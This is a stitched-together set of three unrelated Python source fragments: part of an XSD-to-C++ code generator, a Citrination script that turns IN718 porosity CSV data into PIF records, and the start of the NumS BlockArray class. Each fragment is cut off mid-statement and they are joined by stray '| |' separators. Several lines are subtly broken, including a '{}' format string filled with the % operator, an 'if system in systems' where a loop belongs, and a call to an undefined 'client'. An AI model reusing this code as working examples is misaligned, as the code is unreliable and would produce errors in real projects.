return "%s %s" % (e.type.cpp, checked(e.name))
def _gen_required_attribute_arg_list(context_type: str, attrs: List[UxsdAttribute], out:bool=False, context:str = "ctx") -> str:
args = []
if not out:
args.append("{} &{}".format(context_type, context))
for attr in sorted(attrs, key=lambda attr: attr.name):
if pass_at_init(attr):
args.append(_gen_attribute_arg(attr, out=out))
return ', '.join(args)
def _gen_context_type(t: UxsdComplex, direction : str) -> str:
return "typename ContextTypes::{}{}Context".format(utils.to_pascalcase(t.name), direction)
def _gen_virtual_fns(t: UxsdComplex) -> str:
"""Generate virtual functions to interface with an element with a complex type."""
fields = []
def _add_field(ret: str, verb: str, what: str, args: str):
fields.append("virtual inline %s %s_%s_%s(%s) = 0;" % (ret, verb, t.name, what, args))
def _add_set(e: Union[UxsdElement, UxsdAttribute]):
_add_field("void", "set", e.name, "{}, {} &ctx".format(_gen_attribute_arg(e), _gen_context_type(t, "Write")))
def _add_init(e: UxsdElement):
assert isinstance(e.type, UxsdComplex)
_add_field(_gen_context_type(e.type, "Write"), "init", e.name, _gen_required_attribute_arg_list(_gen_context_type(t, "Write"), e.type.attrs))
_add_field("void", "finish", e.name, _gen_context_type(e.type, "Write") + " &ctx")
def _add_add_simple(e: UxsdElement):
_add_field("void", "add", e.name, "{} {}, {} &ctx" % (e.type.cpp, checked(e.name), _gen_context_type(t, "Write")))
def _add_add_complex(e: UxsdElement):
assert isinstance(e.type, UxsdComplex)
_add_field("void", "preallocate", e.name, _gen_context_type(t, "Write") + " &ctx, size_t size")
_add_field(_gen_context_type(e.type, "Write"), "add", e.name, _gen_required_attribute_arg_list(_gen_context_type(t, "Write"), e.type.attrs))
_add_field("void", "finish", e.name, _gen_context_type(e.type, "Write") + " &ctx")
def _add_add(e: UxsdElement):
if isinstance(e.type, UxsdSimple): _add_add_simple(e)
elif isinstance(e.type, UxsdComplex): _add_add_complex(e)
else: raise TypeError(e)
def _add_get_simple(e: Union[UxsdElement, UxsdAttribute]):
_add_field(e.type.cpp, "get", e.name, _gen_context_type(t, "Read") + " &ctx")
def _add_get_simple_many(e: UxsdElement):
_add_field(e.type.cpp, "get", e.name, _gen_context_type(t, "Read") + " &ctx")
def _add_get_complex(e: UxsdElement):
_add_field(_gen_context_type(e.type, "Read"), "get", e.name, _gen_context_type(t, "Read") + " &ctx")
def _add_get_complex_many(e: UxsdElement):
_add_field(_gen_context_type(e.type, "Read"), "get", e.name, "int n, {}".format(_gen_context_type(t, "Read") + " &ctx"))
def _add_num(e: UxsdElement):
_add_field("size_t", "num", e.name, _gen_context_type(t, "Read") + " &ctx")
def _add_has(e: UxsdElement):
_add_field("bool", "has", e.name, _gen_context_type(t, "Read") + " &ctx")
for attr in t.attrs:
_add_get_simple(attr)
if not pass_at_init(attr):
_add_set(attr)
if isinstance(t.content, (UxsdDfa, UxsdAll)):
for e in t.content.children:
if isinstance(e.type, UxsdComplex):
if e.many:
_add_add_complex(e)
_add_num(e)
_add_get_complex_many(e)
else:
_add_init(e)
_add_get_complex(e)
if e.optional: _add_has(e)
elif isinstance(e.type, UxsdSimple):
if e.many:
_add_add_simple(e)
_add_num(e)
_add_get_simple_many(e)
else:
_add_set(e)
_add_get_simple(e)
else:
raise TypeError(e)
elif isinstance(t.content, UxsdLeaf):
_add_field("void", "set", "value", "{} value, {} &ctx".format(t.content.type.cpp, _gen_context_type(t, "Write")))
_add_field(t.content.type.cpp, "get", "value", _gen_context_type(t, "Read") + " &ctx")
out = ""
out += "/** Generated for complex type \"%s\":\n" % t.name
out += utils.to_comment_body(t.source)
out += "\n*/\n"
out += "\n".join(fields)
return out
def gen_base_class(schema: UxsdSchema) -> str:
"""Generate a C++ base class of a root element."""
out = ""
root = schema.root_element
class_name = utils.to_pascalcase(root.name)
out += "struct Default{pname}ContextTypes {{\n".format(pname=class_name)
out += "\n\t".join("using {}ReadContext = void *;".format(utils.to_pascalcase(x.name)) for x in schema.complex_types)
out += "\n"
out += "\n\t".join("using {}WriteContext = void *;".format(utils.to_pascalcase(x.name)) for x in schema.complex_types)
out += "\n};\n"
out += "\n"
out += "template<typename ContextTypes=Default{pname}ContextTypes>\n".format(pname=class_name)
out += "class %sBase {\n" % class_name
out += "public:\n"
out += "\tvirtual ~%sBase() {}\n" % class_name
out += "\tvirtual void start_load(const std::function<void(const char*)> *report_error) = 0;\n"
out += "\tvirtual void finish_load() = 0;\n"
out += "\tvirtual void start_write() = 0;\n"
out += "\tvirtual void finish_write() = 0;\n"
out += "\tvirtual void error_encountered(const char * file, int line, const char *message) = 0;\n"
virtual_fns = [_gen_virtual_fns(x) for x in schema.complex_types]
out += utils.indent("\n\n".join(virtual_fns))
out += "\n};\n"
return out
#
def tokens_from_enum(t: UxsdEnum) -> str:
"""Generate C++ enum of token values from an UxsdEnum"""
out = "\n"
enum_tokens = ["UXSD_INVALID = 0"]
enum_tokens += [utils.to_token(x) for x in t.enumeration]
out += "enum class %s {%s};" % (t.cpp, ", ".join(enum_tokens))
return out
def lookup_from_enum(t: UxsdEnum) -> str:
"""Generate C++ lookup table of tokens to strings from an UxsdEnum"""
out = ""
lookup_tokens = ["\"UXSD_INVALID\""]
lookup_tokens += ["\"%s\"" % x for x in t.enumeration]
out += "constexpr const char *lookup_%s[] = {%s};" % (t.name, ", ".join(lookup_tokens))
return out
def lexer_from_enum(t: UxsdEnum) -> str:
"""Generate a C++ function to convert const char *s to enum values generated
from an UxsdEnum.
It's in the form of enum_foo lex_enum_foo(const char *in, bool throw_on_invalid)
and currently uses a trie to parse the string.
throw_on_invalid is a hacky parameter to determine if we should throw on
an invalid value. It's currently necessary to read unions - we don't need to
throw on an invalid value if we are trying to read into an union but we need
to throw otherwise.
"""
out = ""
out += "inline %s lex_%s(const char *in, bool throw_on_invalid, const std::function<void(const char *)> * report_error){\n" % (t.cpp, t.cpp)
triehash_alph = [(x, "%s::%s" % (t.cpp, utils.to_token(x))) for x in t.enumeration]
out += utils.indent(triehash.gen_lexer_body(triehash_alph))
out += "\tif(throw_on_invalid)\n"
out += "\t\tnoreturn_report(report_error, (\"Found unrecognized enum value \" + std::string(in) + \" of %s.\").c_str());\n" % t.cpp
out += "\treturn %s::UXSD_INVALID;\n" % t.cpp
out += "}\n"
return out
def tokens_from_complex_type(t: UxsdComplex) -> str:
"""Generate one or two C++ enums of token values from an UxsdComplex.
One enum is generated from valid attribute names and the other from child element names.
"""
out = ""
if isinstance(t.content, (UxsdDfa, UxsdAll)):
enum_tokens = [utils.to_token(e.name) for e in t.content.children]
lookup_tokens = ["\"%s\"" % e.name for e in t.content.children]
out += "enum class gtok_%s {%s};\n" % (t.cpp, ", ".join(enum_tokens))
out += "constexpr const char *gtok_lookup_%s[] = {%s};" % (t.cpp, ", ".join(lookup_tokens))
if t.attrs:
enum_tokens = [utils.to_token(x.name) for x in t.attrs]
lookup_tokens = ["\"%s\"" % x.name for x in t.attrs]
out += "\nenum class atok_%s {%s};\n" % (t.cpp, ", ".join(enum_tokens))
out += "constexpr const char *atok_lookup_%s[] = {%s};\n" % (t.cpp, ", ".join(lookup_tokens))
return out
def lexer_from_complex_type(t: UxsdComplex) -> str:
"""Generate one or two C++ functions to convert const char *s to enum values
generated from an UxsdComplex.
It's in the form of (a|g)tok_foo lex_(attr|node)_foo(const char *in) and currently uses
a trie to lex the string. a or g indicates if the token is an attribute token or a group
(child element) token.
"""
out = ""
if isinstance(t.content, (UxsdDfa, UxsdAll)):
out += "inline gtok_%s lex_node_%s(const char *in, const std::function<void(const char *)> *report_error){\n" % (t.cpp, t.cpp)
triehash_alph = [(e.name, "gtok_%s::%s" % (t.cpp, utils.to_token(e.name))) for e in t.content.children]
out += utils.indent(triehash.gen_lexer_body(triehash_alph))
out += "\tnoreturn_report(report_error, (\"Found unrecognized child \" + std::string(in) + \" of <%s>.\").c_str());\n" % t.name
out += "}\n"
if t.attrs:
out += "inline atok_%s lex_attr_%s(const char *in, const std::function<void(const char *)> * report_error){\n" % (t.cpp, t.cpp)
triehash_alph = [(x.name, "atok_%s::%s" % (t.cpp, utils.to_token(x.name))) for x in t.attrs]
out += utils.indent(triehash.gen_lexer_body(triehash_alph))
out += "\tnoreturn_report(report_error, (\"Found unrecognized attribute \" + std::string(in) + \" of <%s>.\").c_str());\n" % t.name
out += "}\n"
return out
#
def _gen_dfa_table(t: UxsdComplex) -> str:
"""Generate a 2D C++ array representing DFA table from an UxsdComplex's DFA.
The array is indexed by the state and input token value, such that table[state][input]
gives the next state.
"""
assert isinstance(t.content, UxsdDfa)
dfa = t.content.dfa
out = ""
out += "constexpr int NUM_%s_STATES = %d;\n" % (t.cpp.upper(), len(dfa.states))
out += "constexpr const int NUM_%s_INPUTS = %d;\n" % (t.cpp.upper(), len(dfa.alphabet))
out += "constexpr int gstate_%s[NUM_%s_STATES][NUM_%s_INPUTS] = {\n" % (t.cpp, t.cpp.upper(), t.cpp.upper())
for i in range(0, max(dfa.states)+1):
state = dfa.transitions[i]
row = [str(state[x]) if state.get(x) is not None else "-1" for x in dfa.alphabet]
out += "\t{%s},\n" % ", ".join(row)
out += "};\n"
return out
def _gen_stub_suffix(t: Union[UxsdElement, UxsdAttribute], parent: str) -> str:
return "%s_%s" % (parent, t.name)
def _gen_load_simple(t: UxsdSimple, input: str) -> str:
if isinstance(t, UxsdString):
return input
elif isinstance(t, UxsdEnum):
return "lex_%s(%s, true, report_error)" % (t.cpp, input)
else:
return "load_%s(%s, report_error)" % (utils.to_snakecase(t.cpp), input)
def _gen_load_element_complex(t: UxsdElement, parent: str) -> str:
assert isinstance(t.type, UxsdComplex)
out = "{\n"
args = ["context"]
load_args = []
for attr in t.type.attrs:
if not pass_at_init(attr):
continue
arg = "%s_%s" % (t.type.name, checked(attr.name))
out += "\t%s %s;\n" % (attr.type.cpp, arg)
out += "\tmemset(&{name}, 0, sizeof({name}));\n".format(name=arg)
args.append(arg)
load_args.append('&' + arg)
if len(load_args) > 0:
out += "\tload_%s_required_attributes(node, %s, report_error);\n" % (t.type.name, ', '.join(load_args))
if t.many:
out += "\tauto child_context = out.add_%s(%s);\n" % (_gen_stub_suffix(t, parent), ', '.join(args))
else:
out += "\tauto child_context = out.init_%s(%s);\n" % (_gen_stub_suffix(t, parent), ', '.join(args))
out += "\tload_%s(node, out, child_context, report_error, offset_debug);\n" % t.type.name
out += "\tout.finish_%s(child_context);\n" % _gen_stub_suffix(t, parent)
out += "}\n"
return out
def _gen_load_element_simple(t: UxsdElement, parent: str) -> str:
assert isinstance(t.type, UxsdSimple)
out = ""
if t.many:
out += "out.add_%s(%s, context);\n" % (_gen_stub_suffix(t, parent), _gen_load_simple(t.type, "node.child_value()"))
else:
out += "out.set_%s(%s, context);\n" % (_gen_stub_suffix(t, parent), _gen_load_simple(t.type, "node.child_value()"))
return out
def _gen_load_element(t: UxsdElement, parent: str) -> str:
if isinstance(t.type, UxsdComplex):
return _gen_load_element_complex(t, parent)
else:
return _gen_load_element_simple(t, parent)
def _gen_load_attr(t: UxsdAttribute, parent: str) -> str:
if not pass_at_init(t):
return "out.set_%s(%s, context);\n" % (_gen_stub_suffix(t, parent), _gen_load_simple(t.type, "attr.value()"))
else:
return "/* Attribute %s is already set */\n" % t.name
def _gen_load_dfa(t: UxsdComplex) -> str:
"""Partial function to generate the child element validation&loading portion
of a C++ function load_foo, if the model group is an xs:sequence or xs:choice.
xs:sequence/xs:choice groups can be compiled down to a finite automaton.
This is done in dfa.py. C++ state table is generated in _gen_dfa_table and the
stream of child elements are validated according to the table here.
The C++ table has -1s in place of invalid state transitions. If we step into a -1,
we call dfa_error. We check again at the end of input. If we aren't in an accepted
state, we again call dfa_error.
"""
assert isinstance(t.content, UxsdDfa)
dfa = t.content.dfa
any_many = False
out = ""
for el in t.content.children:
if el.many:
if not any_many:
out += "// Preallocate arrays by counting child nodes (if any)\n"
out += "size_t {tag}_count = 0;\n".format(tag=el.name)
any_many = | |
import os
import math
import sys
import pandas as pd
from citrination_client import CitrinationClient
from pypif import pif
from pypif.obj import *
from IN718_porosity_updater.pore_statistics import *
sys.path.insert(0, '/Users/cborg/projects/community_projects/')
from community_projects.pycc_utils import pycc_wrappers
def parse_csv(csv_file_dir, pif_dir):
"""
Takes in csv file from dataset 73, returns pif system
_full.csv = total volume of part
:return:
"""
csv_files = [f for f in os.listdir(csv_file_dir) if ".csv" in f and "_full" not in f]
full_csv_files = [f for f in os.listdir(csv_file_dir) if "_full.csv" in f]
for f in csv_files:
df = pd.read_csv(csv_file_dir+f, encoding="utf-16")
system = ChemicalSystem()
sample_id = f.strip(".csv")
system.ids = [Id(name='Sample ID', value=sample_id)]
cm_x = [Scalar(value=x) for x in df['Center Of Mass X (µm)']]
cm_y = [Scalar(value=x) for x in df['Center Of Mass Y (µm)']]
cm_z = [Scalar(value=x) for x in df['Center Of Mass Z (µm)']]
method = Method(name='porosity', software=Software(name='tracr', version='beta'))
prop_x = Property(name='center of mass X', scalars=cm_x, units='$\mu m$', method=method)
prop_y = Property(name='center of mass Y', scalars=cm_y, units='$\mu m$', method=method)
prop_z = Property(name='center of mass Z', scalars=cm_z, units='$\mu m$', method=method)
system.properties = [prop_x, prop_y, prop_z]
# calc pore stats
pore_stats = ['neighbor pore distance', 'median pore diameter', 'median pore spacing',
'mean pore spacing', 'max pore diameter', 'pore volume', 'pore diameters',
'stdev of pore diameters', 'total pores']
for prop_name in pore_stats:
prop = Property()
prop.name = prop_name
if prop_name == 'median pore diameter':
prop.scalars = Scalar(value=median_pore_diameter(df['Volume (µm³)']))
prop.units = "$\mu m$"
if prop_name == 'neighbor pore distance':
prop.scalars = [Scalar(value=x) for x in nearest_neighbor_distance(df['Center Of Mass X (µm)'],
df['Center Of Mass Y (µm)'],
df['Center Of Mass Z (µm)'])]
prop.units = '$\mu m$'
if prop_name == 'median pore spacing':
prop.scalars = Scalar(value=median_pore_spacing(df['Center Of Mass X (µm)'],
df['Center Of Mass Y (µm)'],
df['Center Of Mass Z (µm)']))
prop.units = '$\mu m$'
if prop_name == 'mean pore spacing':
prop.scalars = Scalar(value=mean_pore_spacing(df['Center Of Mass X (µm)'],
df['Center Of Mass Y (µm)'],
df['Center Of Mass Z (µm)']))
prop.units = '$\mu m$'
if prop_name == 'max pore diameter':
prop.scalars = Scalar(value=max_pore_diameter(df['Volume (µm³)']))
prop.units = '$\mu m$'
if prop_name == 'pore volume':
prop.scalars = [Scalar(value=x) for x in df['Volume (µm³)']]
prop.units = '${\mu m}^3$'
if prop_name == 'pore diameters':
prop.scalars = [Scalar(value=x) for x in sphere_equivalent_diameter(df['Volume (µm³)'])]
prop.units = '$\mu m$'
if prop_name == 'stdev of pore diameters':
prop.scalars = Scalar(value=round(np.std(sphere_equivalent_diameter(df['Volume (µm³)'])), 3))
prop.units = '$\mu m$'
if prop_name == 'total pores':
prop.scalars = Scalar(value=len(df['Volume (µm³)']))
system.properties.append(prop)
print(pif.dumps(system.ids))
outfile_path = pif_dir+f.replace('.csv', '.json')
pif.dump(system, open(outfile_path, 'w'))
for f in full_csv_files:
df = pd.read_csv(csv_file_dir+f, encoding="utf-16")
outfile_path = f.replace('_full.csv', '.json')
if outfile_path in os.listdir(pif_dir):
system = pif.load(open(pif_dir+outfile_path, 'r'))
# system.properties.append(Property(name='Full part volume', scalars=df['Volume (µm³)'], units='${\mu m}^3$'))
for prop in system.properties:
if prop.name == 'pore volume':
total_porosity_vol = sum([sca.value for sca in prop.scalars])
fractional_porosity = round(float(total_porosity_vol / df['Volume (µm³)']), 6)
system.properties.append(Property(name='fraction porosity', scalars=fractional_porosity))
pif.dump(system, open(pif_dir+outfile_path, 'w'))
print("Fraction porosity calc: ", outfile_path)
def get_files_from_dataset(dataset_id, download_path):
client = CitrinationClient(os.environ['CITRINATION_ADAPT_API_KEY'], site='https://adapt.citrination.com')
print(client)
files = client.data.get_dataset_files(dataset_id=dataset_id)
print("Downloading {} files...".format(len(files)))
client.data.download_files(files, destination=download_path)
def add_identifiers_to_pifs(systems, f):
for system in systems:
for prep in system.preparation:
if prep.name == 'printing':
for det in prep.details:
if det.name == 'row':
row_id = det.scalars
if det.name == 'column':
column_id = det.scalars
if row_id >= 10:
sample_id = f.replace("-nohough.json", "") + "_" + column_id + str(row_id)
else:
sample_id = f.replace("-nohough.json", "") + "_" + column_id + "0" + str(row_id)
system.ids = [Id(name='Sample ID', value=sample_id)]
return systems
def add_heat_treatment_to_pifs(systems, f):
for system in systems:
if "P001_B001" in f:
system.preparation.append(
ProcessStep(name="Plate heat treatment", details=Value(name="Heat treatment performed", scalars="YES")))
else:
system.preparation.append(
ProcessStep(name="Plate heat treatment", details=Value(name="Heat treatment performed", scalars="NO")))
return systems
def modify_master_dataset(master_branch_dir, develop_branch_dir):
for f in os.listdir(master_branch_dir):
if ".json" in f:
systems = pif.load(open(master_branch_dir + f))
systems = add_identifiers_to_pifs(systems, f)
systems = add_heat_treatment_to_pifs(systems, f)
systems = add_porosity_data_to_pifs(systems, base_download_path+"data/porosity_jsons/")
systems = add_porosity_stats_to_pifs(systems)
systems = add_pore_diameter_bucket_prop(systems)
systems = remove_unverified_pore_data(systems)
outfile_path = develop_branch_dir+f
pif.dump(systems, open(outfile_path, "w"))
print("DUMPED: ", outfile_path)
def remove_unverified_pore_data(systems):
unverified_ids = ['P001_B001_X13', 'P001_B001_B03', 'P001_B001_B14']
if system in systems:
if system.ids[0].value in unverified_ids:
system.properties = []
return systems
def add_pore_diameter_bucket_prop(systems):
for system in systems:
if system.properties:
for prop in system.properties:
if prop.name == 'pore diameters':
system.properties.append(Property(name='pore diameter < 50 um', scalars=len([i for i in prop.scalars if float(i.value) < 50])))
system.properties.append(Property(name='pore diameter 50 < x < 100 um', scalars=len([i for i in prop.scalars if 50 < float(i.value) < 100])))
system.properties.append(Property(name='pore diameter 100 < x < 150 um', scalars=len([i for i in prop.scalars if 100 < float(i.value) < 150])))
system.properties.append(Property(name='pore diameter 150 < x < 200 um', scalars=len([i for i in prop.scalars if 150 < float(i.value) < 200])))
system.properties.append(Property(name='pore diameter x > 200 um', scalars=len([i for i in prop.scalars if float(i.value) > 200])))
return systems
def add_porosity_data_to_pifs(systems, data_porosity_jsons):
for f in os.listdir(data_porosity_jsons):
if ".json" in f:
porosity_data_system = pif.load(open(data_porosity_jsons+f, "r"))
porosity_system_sample_id = porosity_data_system.ids[0].value
for system in systems:
main_system_sample_id = system.ids[0].value
if main_system_sample_id == porosity_system_sample_id:
system.properties = porosity_data_system.properties
return systems
def add_porosity_stats_to_pifs(systems):
for system in systems:
if system.properties:
prop_names = [prop.name for prop in system.properties]
for prop in system.properties:
if prop.name == 'pore volume':
pore_volumes = [float(sca.value) for sca in prop.scalars]
r_squared_norm = round(qq_normal(sphere_equivalent_diameter(pore_volumes))[2]**2, 4)
r_squared_lognorm = round(qq_lognormal(sphere_equivalent_diameter(pore_volumes))[2]**2, 4)
system.properties.append(Property(name='r_squared_norm', scalars=r_squared_norm))
system.properties.append(Property(name='r_squared_lognorm', scalars=r_squared_lognorm))
if r_squared_norm > r_squared_lognorm:
system.properties.append(Property(name='dist_best_fit', scalars='NORM'))
else:
system.properties.append(Property(name='dist_best_fit', scalars='LOGNORM'))
if 'pore diameters' not in prop_names:
pore_diameters = [Scalar(value=x) for x in sphere_equivalent_diameter(pore_volumes)]
system.properties.append(Property(name='pore diameters', scalars=pore_diameters, units='$\mu m$'))
if 'stdev of pore diameters' not in prop_names:
stdev = Scalar(value=round(np.std(sphere_equivalent_diameter(pore_volumes)), 3))
system.properties.append(Property(name='stdev of pore diameters', scalars=stdev, units='$\mu m$'))
if 'total pores' not in prop_names:
total_pores = Scalar(value=len(pore_volumes))
system.properties.append(Property(name='total pores', scalars=total_pores))
if prop.name == 'max pore diameter':
mpd = float(prop.scalars.value)
if mpd > 200:
system.properties.append(Property(name='Pore size warning', scalars='RED'))
else:
system.properties.append(Property(name='Pore size warning', scalars='GREEN'))
if mpd > 200:
system.properties.append(Property(name='Pore size warning (ternary)', scalars='RED'))
elif 75 < mpd < 200:
system.properties.append(Property(name='Pore size warning (ternary)', scalars='YELLOW'))
else:
system.properties.append(Property(name='Pore size warning (ternary)', scalars='GREEN'))
system.properties.append(Property(name="log max pore diameter", scalars=Scalar(value=math.log10(mpd))))
if prop.name == 'median pore diameter':
if prop.scalars.value > 22:
system.properties.append(Property(name='Median pore classifier', scalars='>22 um'))
else:
system.properties.append(Property(name='Median pore classifier', scalars='<22 um'))
return systems
def refine_to_relevant_props(develop_branch_dir, feature_branch_dir):
porosity_props = ['max pore diameter', 'mean pore diameter', 'fraction porosity', 'median pore spacing',
'median pore diameter', 'log max pore diameter', 'Pore size warning',
'Pore size warning (ternary)', 'total pores', 'stdev of pore diameters', 'dist_best_fit',
'r_squared_norm', 'r_squared_lognorm', 'pore diameter < 50 um', 'pore diameter 50 < x < 100 um',
'pore diameter 100 < x < 150 um', 'pore diameter 150 < x < 200 um', 'pore diameter x > 200 um',
'Median pore classifier']
mechanical_props = ['elastic modulus', 'elastic onset', 'yield strength', 'yield strain', 'ultimate strength',
'necking onset', 'fracture strength', 'total elongation', 'ductility', 'toughness']
selected_prop_names = porosity_props + mechanical_props
for f in os.listdir(develop_branch_dir):
if ".json" in f:
new_systems = []
infile_path = develop_branch_dir + f
old_systems = pif.load(open(infile_path, 'r'))
print(infile_path, len(old_systems))
for old_system in old_systems:
new_system = ChemicalSystem()
new_system.names = old_system.names
new_system.references = old_system.references
new_system.ids = old_system.ids
new_system.preparation = old_system.preparation
# new_system.sub_systems = old_system.sub_systems
new_system.properties = []
if old_system.properties:
for prop in old_system.properties:
if prop.name in selected_prop_names:
new_system.properties.append(prop)
# mechanical props stored in subsystem
if old_system.sub_systems:
for sub_system in old_system.sub_systems:
if sub_system.properties:
for prop in sub_system.properties:
if prop.name in selected_prop_names:
new_system.properties.append(prop)
new_systems.append(new_system)
outfile_path = feature_branch_dir+f.replace(".json", "_refined.json")
pif.dump(new_systems, open(outfile_path, 'w'))
def upload_pifs(base_input_dir, dataset_id):
for f in os.listdir(base_input_dir):
if ".json" in f:
print("UPLOADING: ", base_input_dir+f)
result = client.data.upload(dataset_id, base_input_dir+f, dest_path=f)
print(result.__dict__)
def remove_outliers(base_input_dir):
for f in os.listdir(base_input_dir):
if "_refined.json" in f:
print(f)
infile_path = base_input_dir+f
systems = pif.load(open(infile_path, 'r'))
for system in systems:
for prop in system.properties:
if prop.name == 'max pore diameter':
mpd = float(prop.scalars.value)
if mpd > 120:
print(pif.dumps(prop))
prop.scalars = ""
outfile_path = infile_path.replace(".json", "_no_outliers.json")
pif.dump(systems, open(outfile_path, 'w'))
# refines unlabeled records in design space to just records from P005_B002
def refine_design_space(input_dir, output_dir):
for f in os.listdir(input_dir):
if ".json" in f:
infile_path = input_dir + f
systems = pif.load(open(infile_path, 'r'))
print(f, len(systems))
refined_systems = []
for system in systems:
if not system.properties and "P005_B002" not in f:
pass
else:
refined_systems.append(system)
print(f, len(refined_systems))
outfile_path = output_dir + f
pif.dump(refined_systems, open(outfile_path, 'w'))
def refine_by_id(input_dir, output_dir):
ids = ["P005_B002_V09", "P005_B002_U09", "P005_B002_W09", "P005_B002_O04", "P005_B002_P04", "P005_B002_V07",
"P005_B002_Y09", "P005_B002_V04", "P005_B002_T09", "P005_B002_V10", "P005_B002_V06", "P005_B002_V08",
"P005_B002_V02", "P005_B002_V01", "P005_B002_L06", "P005_B002_V05", "P005_B002_O03", "P005_B002_L07",
"P005_B002_X10", "P005_B002_C14", "P005_B002_V11", "P005_B002_B14", "P005_B002_A15", | |
# coding=utf-8
# Copyright (C) 2020 NumS Development Team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import numpy as np
from nums.core.array import selection
from nums.core.array import utils as array_utils
from nums.core.array.base import BlockArrayBase, Block
from nums.core.array.view import ArrayView
from nums.core.grid.grid import ArrayGrid
class BlockArray(BlockArrayBase):
@classmethod
def empty(cls, shape, block_shape, dtype, cm):
grid = ArrayGrid(shape=shape,
block_shape=block_shape,
dtype=dtype.__name__)
grid_meta = grid.to_meta()
arr = BlockArray(grid, cm)
for grid_entry in grid.get_entry_iterator():
arr.blocks[grid_entry].oid = cm.empty(grid_entry, grid_meta,
syskwargs={
"grid_entry": grid_entry,
"grid_shape": grid.grid_shape
})
return arr
@classmethod
def from_scalar(cls, val, cm):
if isinstance(val, int):
dtype = int
elif isinstance(val, float):
dtype = float
else:
assert isinstance(val, (np.int32, np.int64, np.float32, np.float64))
dtype = None
return BlockArray.from_np(np.array(val, dtype=dtype),
block_shape=(),
copy=False,
cm=cm)
@classmethod
def from_oid(cls, oid, shape, dtype, cm):
block_shape = shape
grid = ArrayGrid(shape, block_shape, dtype.__name__)
ba = BlockArray(grid, cm)
for i, grid_entry in enumerate(grid.get_entry_iterator()):
assert i == 0
ba.blocks[grid_entry].oid = oid
return ba
@classmethod
def from_np(cls, arr, block_shape, copy, cm):
dtype_str = str(arr.dtype)
grid = ArrayGrid(arr.shape, block_shape, dtype_str)
rarr = BlockArray(grid, cm)
grid_entry_iterator = grid.get_entry_iterator()
for grid_entry in grid_entry_iterator:
grid_slice = grid.get_slice(grid_entry)
block = arr[grid_slice]
if copy:
block = np.copy(block)
rarr.blocks[grid_entry].oid = cm.put(block)
rarr.blocks[grid_entry].dtype = getattr(np, dtype_str)
return rarr
@classmethod
def from_blocks(cls, arr: np.ndarray, result_shape, cm):
sample_idx = tuple(0 for dim in arr.shape)
if isinstance(arr, Block):
sample_block = arr
result_shape = ()
else:
sample_block = arr[sample_idx]
if result_shape is None:
result_shape = array_utils.shape_from_block_array(arr)
result_block_shape = sample_block.shape
result_dtype_str = sample_block.dtype.__name__
result_grid = ArrayGrid(shape=result_shape,
block_shape=result_block_shape,
dtype=result_dtype_str)
assert arr.shape == result_grid.grid_shape
result = BlockArray(result_grid, cm)
for grid_entry in result_grid.get_entry_iterator():
if isinstance(arr, Block):
block: Block = arr
else:
block: Block = arr[grid_entry]
result.blocks[grid_entry] = block
return result
def copy(self):
grid_copy = self.grid.from_meta(self.grid.to_meta())
rarr_copy = BlockArray(grid_copy, self.cm)
for grid_entry in grid_copy.get_entry_iterator():
rarr_copy.blocks[grid_entry] = self.blocks[grid_entry].copy()
return rarr_copy
def touch(self):
"""
"Touch" an array. This is an efficient distributed "wait" operation.
"""
oids = []
for grid_entry in self.grid.get_entry_iterator():
block: Block = self.blocks[grid_entry]
oids.append(self.cm.touch(block.oid, syskwargs={
"grid_entry": block.grid_entry,
"grid_shape": block.grid_shape
}))
self.cm.get(oids)
return self
def reshape(self, *shape, **kwargs):
block_shape = kwargs.get("block_shape", None)
if array_utils.is_int(shape):
shape = (shape,)
elif len(shape) == 0:
shape = self.shape
elif isinstance(shape[0], (tuple, list)):
assert len(shape) == 1
shape = shape[0]
else:
assert all(np.issubdtype(type(n), int) for n in shape)
shape = Reshape.compute_shape(self.shape, shape)
if block_shape is None:
if shape == self.shape:
# This is a noop.
block_shape = self.block_shape
else:
block_shape = self.cm.get_block_shape(shape, self.dtype)
return Reshape()(self, shape, block_shape)
def expand_dims(self, axis):
"""
This function refers to the numpy implementation of expand_dims.
"""
if type(axis) not in (tuple, list):
axis = (axis,)
out_ndim = len(axis) + self.ndim
axis = np.core.numeric.normalize_axis_tuple(axis, out_ndim)
shape_it = iter(self.shape)
block_shape_it = iter(self.block_shape)
shape = [1 if ax in axis else next(shape_it) for ax in range(out_ndim)]
block_shape = [1 if ax in axis else next(block_shape_it) for ax in range(out_ndim)]
return self.reshape(shape, block_shape=block_shape)
def squeeze(self):
shape = self.shape
block_shape = self.block_shape
new_shape = []
new_block_shape = []
for s, b in zip(shape, block_shape):
if s == 1:
assert b == 1
continue
new_shape.append(s)
new_block_shape.append(b)
return self.reshape(new_shape, block_shape=new_block_shape)
def swapaxes(self, axis1, axis2):
meta_swap = self.grid.to_meta()
shape = list(meta_swap["shape"])
block_shape = list(meta_swap["block_shape"])
dim = len(shape)
if axis1 >= dim or axis2 >= dim:
raise ValueError("axis is larger than the array dimension")
shape[axis1], shape[axis2] = shape[axis2], shape[axis1]
block_shape[axis1], block_shape[axis2] = block_shape[axis2], block_shape[axis1]
meta_swap["shape"] = tuple(shape)
meta_swap["block_shape"] = tuple(block_shape)
grid_swap = ArrayGrid.from_meta(meta_swap)
rarr_src = np.ndarray(self.blocks.shape, dtype='O')
for grid_entry in self.grid.get_entry_iterator():
rarr_src[grid_entry] = self.blocks[grid_entry].swapaxes(axis1, axis2)
rarr_src = rarr_src.swapaxes(axis1, axis2)
rarr_swap = BlockArray(grid_swap, self.cm, rarr_src)
return rarr_swap
def __getattr__(self, item):
if item == "__array_priority__" or item == "__array_struct__":
# This is triggered by a numpy array on the LHS.
raise ValueError("Unable to covert numpy array to block array.")
elif item == "ndim":
return len(self.shape)
elif item == "T":
metaT = self.grid.to_meta()
metaT["shape"] = tuple(reversed(metaT["shape"]))
metaT["block_shape"] = tuple(reversed(metaT["block_shape"]))
gridT = ArrayGrid.from_meta(metaT)
rarrT = BlockArray(gridT, self.cm)
rarrT.blocks = np.copy(self.blocks.T)
for grid_entry in rarrT.grid.get_entry_iterator():
rarrT.blocks[grid_entry] = rarrT.blocks[grid_entry].transpose()
return rarrT
else:
raise NotImplementedError(item)
def __getitem__(self, item):
if not isinstance(item, tuple):
ss = (item,)
else:
ss = item
# We need to fetch any block arrays.
tmp = []
for entry in ss:
